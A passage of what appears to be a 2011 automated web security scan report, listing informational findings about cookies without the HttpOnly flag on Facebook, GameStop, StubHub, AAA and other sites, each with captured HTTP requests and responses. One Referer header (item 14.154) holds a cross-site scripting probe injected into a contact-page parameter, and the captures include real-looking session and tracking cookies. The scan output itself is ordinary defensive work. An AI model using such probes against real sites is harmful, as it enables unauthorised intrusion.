Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.123.33
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 22399

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/4oh4.php";window._EagleEyeSeed="af0Z";</script><noscript>
...[SNIP]...

14.150. http://www.facebook.com/mobile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mobile/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.124.65
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:29 GMT
Content-Length: 18096

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/mobile\/index.php";window._EagleEyeSeed="ynVf";</script><
...[SNIP]...

14.151. http://www.facebook.com/pages/create.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/create.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/create.php?ref_type=sitefooter HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fadvertising%2F%3Fcampaign_id%3D402047449186%26placement%3Dpflo%26extra_1%3D0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.125.46
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:29 GMT
Content-Length: 32607

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/pages\/create.php";window._EagleEyeSeed="F3jP";</script><
...[SNIP]...

14.152. http://www.facebook.com/privacy/explanation.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /privacy/explanation.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy/explanation.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.113.53
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 28323

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/privacy\/explanation.php";window._EagleEyeSeed="O3Ue";</s
...[SNIP]...

14.153. http://www.fansnap.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fansnap.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.fansnap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:43:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 115
ETag: "d77c6a4a9298bbbbdb807bc3ffe96fee"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: tvid=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: vid=1342567440282625; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:43:36 GMT
Set-Cookie: lvd=1311101016; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:43:36 GMT
Set-Cookie: _fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoIbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUALOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNctobgH7tQ64GOgtvZmZzZXRp%2FpCdOg12aXNpdF9pZGkEKF1kHzoPdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToOc3R5bGVfaWRzSSIABjsIRg%3D%3D--7382d0abaaf72a07ec28bc0ebd8430ba3e768e1a; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 41554
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...

14.154. http://www.fastteks.com.asp1-14.websitetestlink.com/css/styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fastteks.com.asp1-14.websitetestlink.com
Path:   /css/styles.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/styles.css HTTP/1.1
Host: www.fastteks.com.asp1-14.websitetestlink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://support.fastteks.com/contact-us.php?d5afa%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ec2243c61dfa=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: text/css
Date: Tue, 19 Jul 2011 18:22:54 GMT
Accept-Ranges: bytes
ETag: "49247de61fcc1:0"
Set-Cookie: X-Mapping-jgcdejoi=A1A4C9B40D872C052684DC61F49939F2; path=/
Last-Modified: Tue, 31 May 2011 23:00:08 GMT
X-Powered-By: ASP.NET
X-Cache-Info: caching
Content-Length: 12910

/* CSS Document This is a Three Column Fixed Width Center aligned */

@import url("popupSystem.css"); /*Pop-up system*/
@import url("popupStyles.css"); /*Pop-up styles*/

/****************************
...[SNIP]...

14.155. http://www.gamestop.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamestop.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Jul 2011 16:04:51 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:04:51 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,3375,3375,4300,4265,3852,4151,4287,3362,4228,4226,4227,3383; path=/
Set-Cookie: CactusState=V=1&31=True; path=/
Content-Length: 317530


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...

14.156. http://www.gamestop.com/Recommendations.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamestop.com
Path:   /Recommendations.axd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /Recommendations.axd HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
Content-Length: 122
Origin: http://www.gamestop.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/json; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LocaleCookie=en-us; MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; CactusState=V=1; BIGipServerwww.gamestop.com-80=650777772.20480.0000; s_pers=%20s_vs%3D1%7C1311093155823%3B%20gpv%3Dhomepage%253A%2520homepage%7C1311093155836%3B%20s_nr%3D1311091355838-New%7C1342627355838%3B%20s_dl%3D1%7C1311093155841%3B%20s_cvp2%3D%255B%255B'Direct%252520Load'%252C'1311091355845'%255D%255D%7C1468944155845%3B%20ttcp%3D1311177755847%7C1311177755847%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20intcmp%3D%3B%20omtc%3D%3B%20cmgvo%3DDirect%2520LoadundefinedDirect%2520Load%3B%20s_ni%3DNo%2520Match%3B%20s_sq%3D%3B; s_vi=[CS]v1|2712D54A05079204-60000102C001DD4F[CE]; __utma=17130671.1755673011.1311091358.1311091358.1311091358.1; __utmb=17130671.1.10.1311091358; __utmc=17130671; __utmz=17130671.1311091358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

{"l":"peYfab2EsTTWwlqkVMgA4Q==","r":"rcxKUs77Dw02ESv5cb+e+w==","rr":"IF8Yy95dSt9Ecb50XY6Mog==","c":"Locale=en-US","su":""}

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/json; charset=utf-8
Content-Length: 10
Date: Tue, 19 Jul 2011 16:04:47 GMT
Connection: close
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:04:47 GMT; path=/
Set-Cookie: CactusState=V=1&31=False; path=/
Set-Cookie: RES_TRACKINGID=783322707284241; domain=gamestop.com; expires=Mon, 19-Jul-2021 16:04:47 GMT; path=/

{"d":null}

14.157. http://www.googleadservices.com/pagead/aclk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/aclk?sa=L&ai=CPH-SnJIlTrWpOqim0AHA6aX0DOa9svYB5pSUvRen7okNCAAQASgDUJG-0JD6_____wFgyQagAZCcu_8DyAEBqgQdT9Cd47qH80f6Nx47dbX5y11gZfJydyfdR3IrEIk&ved=0CDcQ0Qw&val=ChAzODFiZTJhNWE0ZTMyMWRlELL2tO4EGggBbvQez3VW6SABKAAw28LpkrLIlPUXOMbC9O4EQMntjPEE&sig=AOD64_2UaZJABDJ5NxcdREK4EGt-3pUxCg&adurl=http://www.atlassian.com/software/jira HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Set-Cookie: Conversion=CoABQ1BILVNuSklsVHJXcE9xaW0wQUhBNmFYMERPYTlzdllCNXBTVXZSZW43b2tOQ0FBUUFTZ0RVSkctMEpENl9fX19fd0ZneVFhZ0FaQ2N1XzhEeUFFQnFnUWRUOUNkNDdxSDgwZjZOeDQ3ZGJYNXkxMWdaZkp5ZHlmZFIzSXJFSWsSEwjez9-GzY2qAhVJceUKHa1uA8cYASDGpIGn_obM2rUBSAE; expires=Thu, 18-Aug-2011 14:20:20 GMT; path=/pagead/conversion/1072614928/
Cache-Control: private
Location: http://www.atlassian.com/software/jira?gclid=CN7P34bNjaoCFUlx5QodrW4Dxw
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 19 Jul 2011 14:20:20 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block


14.158. http://www.nne.aaa.com/en-nne/Pages/Home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nne.aaa.com
Path:   /en-nne/Pages/Home.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-nne/Pages/Home.aspx?zip=05672&referer=www.aaa.com HTTP/1.1
Host: www.nne.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route?rclub=36&rurl=http%3a%2f%2fwww.nne.aaa.com%2fen-nne%2fPages%2fHome.aspx
Cookie: zipcode=05672|AAA|36

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 19:04:25 GMT
Server: Microsoft-IIS/6.0
ACSC: WEB04
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: acezipcode=36|AAA|05672; expires=Thu, 19-Jul-2012 19:04:24 GMT; path=/
Cache-Control: private
Expires: Tue, 19 Jul 2011 19:07:25 GMT
Vary: *, Accept-Encoding, User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 97400


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir="ltr">
<
...[SNIP]...

14.159. http://www.stubhub.com/TeaLeafTarget.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stubhub.com
Path:   /TeaLeafTarget.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /TeaLeafTarget.html HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
Content-Length: 973
Origin: http://www.stubhub.com
X-TeaLeaf-Page-Img-Fail: 2
X-TeaLeaf-Page-Render: 6032
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2011.03.15.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: INIT
X-TeaLeaf-Page-Url: /
X-TeaLeaf-Browser-Res: 2
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1345314947|check#true#1311100607|session#1311100546147-926694#1311102407; s_pers=%20s_nr%3D1311100550187-Repeat%7C1345228550187%3B%20currentCTC%3DC12289x970%7C1313692550208%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%252C%255B'C12289x970'%252C'1311100550213'%255D%255D%7C1468953350213%3B%20currentCVP%3DRF%253A%2520burp%253EC12289x970%7C1313692550219%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%252C%255B'7%252F19%252F2011%2525206%25253A35%252520PM'%252C'1311100550224'%255D%255D%7C1468953350224%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=6923598397700396013; bn_recs=baynoteON; fsr.s={"cp":{"userid":"","pagetype":"Browse_event","url":"http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298","genre":"U2 Tickets","genreid":"602","event":"U2 with Interpol Tickets (Rescheduled from 7/19/2010)","eventid":"906484","genreparentid":"602","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$62.00'","fee":"","TT_variant":""},"v":1,"rid":"1311100555294_43119","ru":"http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669","r":"bing.fansnap.com","st":"","to":3,"c":"http://www.stubhub.com/","pv":1,"lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1}; TLTHID=EC632AD4B23510B2E9D1AE6611395988

<ClientEventSet PostTimeStamp="1311100582301" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" TimeDuration="6032" DateSince1970="1311100552237" PageId="ID13H35M46S205R0.5240641888231039" >

...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:37:55 GMT
Server: Apache
Set-Cookie: TLTHID=379551A8B23610B2DCD699373A2BF429; Path=/; Domain=.stubhub.com
Last-Modified: Tue, 16 Feb 2010 20:48:57 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 180
Content-Type: text/html

<html>
<head>
<meta HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
<title id=titletext>OK</title>
</head>
<body bgcolor=white>
</body>

</html>



14.160. http://www.stubhub.com/assets/default.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stubhub.com
Path:   /assets/default.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/default.css HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
